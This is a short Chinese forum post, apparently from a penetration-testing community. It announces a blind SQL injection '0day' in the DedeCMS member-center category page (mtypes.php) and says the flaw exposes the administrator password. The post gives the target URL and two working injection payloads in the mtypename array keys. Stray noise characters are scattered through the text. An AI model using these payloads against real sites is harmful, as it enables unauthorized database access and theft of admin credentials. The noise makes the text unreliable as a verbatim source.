中国网络渗透测试联盟

标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 [打印本页]

作者: admin    时间: 2012-12-20 08:08
标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.2 E) C6 W  h2 T' u

9 q( \, B: f2 g* V; Q
6 O) T1 m7 `0 l  ?4 L, R2 K发生在数组key里的注射漏洞,有点意思.
9 [/ K$ i% S1 Y# s4 b2 _( x % t/ M7 k- G# ?6 Z* S
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
4 \1 s$ i' j9 N) G1 f# g
( O/ w5 D1 N' s8 {http://www.xxx.com /dede/member/mtypes.php?dopost=save* i6 k1 Y1 A) |, W9 |

! a7 t" \6 G- q, T  \: B, k9 [7 Kexploit:
& U" g5 P- N$ {$ C8 k  umtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r. q; J! o: e2 i; ^  L
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
) E3 e; a! U7 B' G) B, w1 K4 E




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2